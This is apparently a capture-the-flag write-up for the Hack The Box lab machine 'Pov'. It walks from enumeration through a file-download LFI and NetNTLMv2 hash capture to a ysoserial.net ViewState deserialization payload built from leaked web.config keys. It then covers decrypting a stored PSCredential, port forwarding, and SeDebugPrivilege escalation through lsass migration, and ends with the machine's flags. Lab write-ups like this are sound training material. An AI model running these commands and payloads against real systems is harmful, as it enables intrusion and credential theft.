Nmap Results
# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 13.98 ms 10.10.14.1
2 14.12 ms 10.10.11.251
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 seconds
Service Enumeration
TCP/80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
We can see that the default page on the target web server has a title of pov.htb
. Let's add that to our /etc/hosts
file.
echo '10.10.11.251 pov.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100
/Index.html (Status: 200) [Size: 12330]
/css (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html (Status: 200) [Size: 12330]
/js (Status: 301) [Size: 141] [--> http://pov.htb/js/]
Virtual Hosts
# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]
dev.pov.htb
On the contact.aspx
page, there appears to be a form that makes a HTTP POST
request to itself. Not sure if this is exploitable yet.
More Directory and File Enumeration
# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404
/Contact.aspx (Status: 200) [Size: 4691]
/Default.aspx (Status: 200) [Size: 21371]
/assets (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx (Status: 200) [Size: 4691]
/default.aspx (Status: 200) [Size: 21371]
If we try and navigate to http://dev.pov.htb/portfolio/assets
, you can see that the web server redirects us to http://dev.pov.htb:8080
.
Testing the Download Function
Clicking the Download CV
button invokes a __doPostBack
JavaScript event of download
and uses the file name cv.pdf
by default.
I got really lucky with my guess that the cv.pdf
file is stored at the root of the directory.
Download CV
button is just pulling the cv.pdf
file from this directory. Looking at my Burp request history, I notice there are other files we can test with in the /portfolio/
directory. It should be possible to download files by simply modifying the file=
parameter in the POST
request. Let's see if we can download any of the above files from the server. The procedure will go like this:
- Turn on Burp intercept
- Click the
Download CV
button - Change the
cv.pdf
filename todefault.aspx
- Check and see if we got the page source code
Additional Download Tests
This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater
.
In the source code we downloaded above, we noted that the CodeFile=index.aspx.cs
attribute where the default.aspx
page runs its server-side code. Let's take a look at that file. In repeater, change &file=default.aspx
to &file=index.aspx.cs
and click Run.
Nice! We are able to read the C#
code that will run server side when we load the page initially or interact with the Download
even listener. There appears to be a bit of user input sanitization in the file=
parameter as well, which wasn't a problem for us, as we used backslashes.
Let's take a look at contact.aspx
and do the same thing. Load the page source, then load the server-side source.
Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.
Absolute paths also worked flawlessly without needing to do any special tricks. &file=C:\Windows\System32\drivers\etc\hosts
.
As well as relative file path, where I was able to find the config file for the dev.pov.htb
host — &file=..\web.config
.
I even found that I can capture sfitz
NetNTLMv2 hash by using impacket-smbserver
and specifying &file=\\kali_vpn_ip\share_name\file_name
.
I also tried creating reverse .aspx
and web.config
shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name
, even with other TCP ports specified.
Exploit
VIEWSTATE Deserialization with Secrets
I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:
Response.TransmitFile()
exploitabilityResponse.AppendHeader()
exploitability
However, it was this search that ultimately opened the door to code execution:
The HackTricks page advises us to use the ysoserial.exe
binary to generate a serialized VIEWSTATE
command that will be de-serialized by the server. In this case, we know the encryption secrets, as we have access to the web.config
file.
ysoserial
tool to a Windows VM, your Windows host, or run it using Wine on Kali. I'm going to do it the Wine way, cause I like pain.Installing Wine Dependencies
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-complete
Installing Wine-Mono
First, check the installed version of wine
by running wine --version
. In the screenshot below, you'll see I have version 8.0.1
.
Next, we should consult the wine-mono
version table here:
I am not at version 8.9
but my version is greater than 7.20
, therefore, we should install wine-mono
version 7.4.0
.
wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstaller
wine: could not load kernel32.dll, status c0000135
, just run rm -rf ~/.wine/
. Then, re-run wine uninstaller
.Install .NET Libraries
winetricks dotnet48
Generating the Serialized Payload
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/Release
We'll be referencing the example command here to generate the payload.
# LD_PRELOAD= : a runtime environment variable to silence some errors on my host
# 2>/dev/null : Because wine was creating some weird error output that interfered with the payload
# sed s/\n//g' : Join on line breaks, not sure if wine is creating them
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'
Weaponizing the Payload
Go into your proxy settings and set to Intercept is on
.
Click the Download CV
button.
Note the request is intercepted and held by Burp. Highlight the VIEWSTATE
parameter all the way up until the first &
(ampersand).
Overwrite the contents of the VIEWSTATE
parameter with your payload generated. Recall that the command I used in the example is ping 10.10.14.15
, so I'm going to attempt to have the target ping my Kali VPN IP.
Go back into Burp and press the Forward
button.
Note that I used tcpdump
to listen for ICMP
traffic on my tun0
interface and you can see the incoming ICMP echo request
packets from 10.10.11.251
(the target's IP address).
Getting a Reverse Shell
Transfer nc.exe to the Target
Trigger a Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: POV
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA076
Original Install Date: 10/26/2023, 1:01:55 PM
System Boot Time: 2/2/2024, 6:46:50 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use: 770 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.251
[02]: fe80::4666:410:2b2c:7069
[03]: dead:beef::4d88:e9c:6f0c:4b61
[04]: dead:beef::a9
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\POV
-------------------------------------------------------------------------------
Administrator alaading DefaultAccount
Guest sfitz WDAGUtilityAccount
The command completed successfully.
Local Groups
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a9
IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
IPv4 Address. . . . . . . . . . . : 10.10.11.251
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
10.10.10.2
Open Ports
localaddress localport
------------ ---------
:: 49668
:: 49667
:: 49666
:: 49665
:: 49664
:: 47001
:: 5985
:: 445
:: 135
:: 80
0.0.0.0 49668
0.0.0.0 49667
0.0.0.0 49666
0.0.0.0 49665
0.0.0.0 49664
10.10.11.251 139
0.0.0.0 135
Interesting Files
C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
Privilege Escalation
Lateral to Alaading
In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml
file, which when inspected is a PowerShell PSCredential
object stored in clixml
format.
I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease.
$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
You may also have noticed in the post-exploit enumeration that tcp/5985
is open in the listening ports. It is definitely behind Windows firewall, as it wasn't exposed in our initial nmap
scan. We can use chisel
to forward this port.
alaading
, we repeat the post-exploit enumeration process.Alternative Lateral to Alaading
- Transfer
RunasCs.exe
to the target - Start a TCP listener
- Run the command to connect to the TCP listener with
alaading
credentials
Escalate to Administrator
SeDebugPrivilege
given to this user account to achieve NT AUTHORITY/SYSTEM
or Administrator
without meterpreter
. I was able to dump lsass
using procdump
, but the Administrator didn't have a cached session. Other techniques were also fruitless.Metasploit
meterpreter > migrate -N lsass.exe
Flags
User
6554d872ca302f4e5c7c31ac06f8f638
Root
8f5b63e0cff832f141a776127bb09758